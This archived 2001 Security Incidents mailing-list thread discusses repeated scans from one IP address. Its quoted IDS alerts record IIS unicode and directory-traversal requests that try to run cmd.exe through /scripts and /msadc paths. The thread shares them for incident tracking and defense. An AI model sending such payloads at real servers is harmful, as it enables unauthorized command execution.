Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Attempted unicode scans. on network

From: gattaca () hushmail com
Date: Thu, 28 Jun 2001 22:58:42 -0600 (CDT)
Jason,

I've seen this address (202.96.119.134 CHINANET Zhejiang province network) 
and many like it.The machines on my WAN get swept 100's of times per day. 
Not too long ago someone on this list was good enough to break out the address 
blocks for my ACL's. I apologize for not giving that person credit as their 
name escapes me at the moment. If you are interested I can send this to 
you if it would help.

cheers,
gattaca

----------------------
liquidmatrix.Org
----------------------

<orig>
Okay though, you have probably seen this 200 or 300 times over.  Though 
I 
just wanted to add this for anyone who is keeping a database of incidents.

On Jun 26, 2001 we received the following vulnerability scan, on our servers,
 
which lasted approximately 22 minutes, and attempted to connect to every 
server we have.

Though I would like to know if anyone else was hit by this person?

Jason

TRACE

[**] WEB-MISC http directory traversal [**]
Jun 26,01 02:54:48am    202.96.119.134:38331 -> x.x.x.x:80
TTL: 234        TOS: 0x0        ID:60075
***AP*** Seq: 1161185518 Ack: 1704311082 Win: 8760

474554202F736372697074732F2E2E25632E2E2F        GET./scripts/..%c../
77696E6E742F73797374656D33322F636D642E65        winnt/system32/cmd.e
78653F2F632B64697220485454502F312E300D0A        xe?/c+dir.HTTP/1.0..
0D0A                                            ....................

[snip]

[**] WEB-FRONTPAGE fourdots request [**]
Jun 26,01 02:58:08am    202.96.119.134:54761 -> x.x.x.x:80
TTL: 234        TOS: 0x0        ID:44929
***AP*** Seq: 794224914 Ack: 2261806000 Win: 8760

474554202F6D736164632F2E2E2565302E2E2F2E        GET./msadc/..%e0../.
2E662E2E2E2E2F2E2E3025382E2E2F77696E6E74        .f..../..0%8../winnt
2F73797374656D33322F636D642E6578653F2F63        /system32/cmd.exe?/c
2B64697220485454502F312E300D0A0D0A              +dir.HTTP/1.0.......

[snip]



---
Jason Robertson                
Network Analyst            
jason () ifutureinc com    
http://www.astroadvice.com      
</orig>
Free, encrypted, secure Web-based email at www.hushmail.com


----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: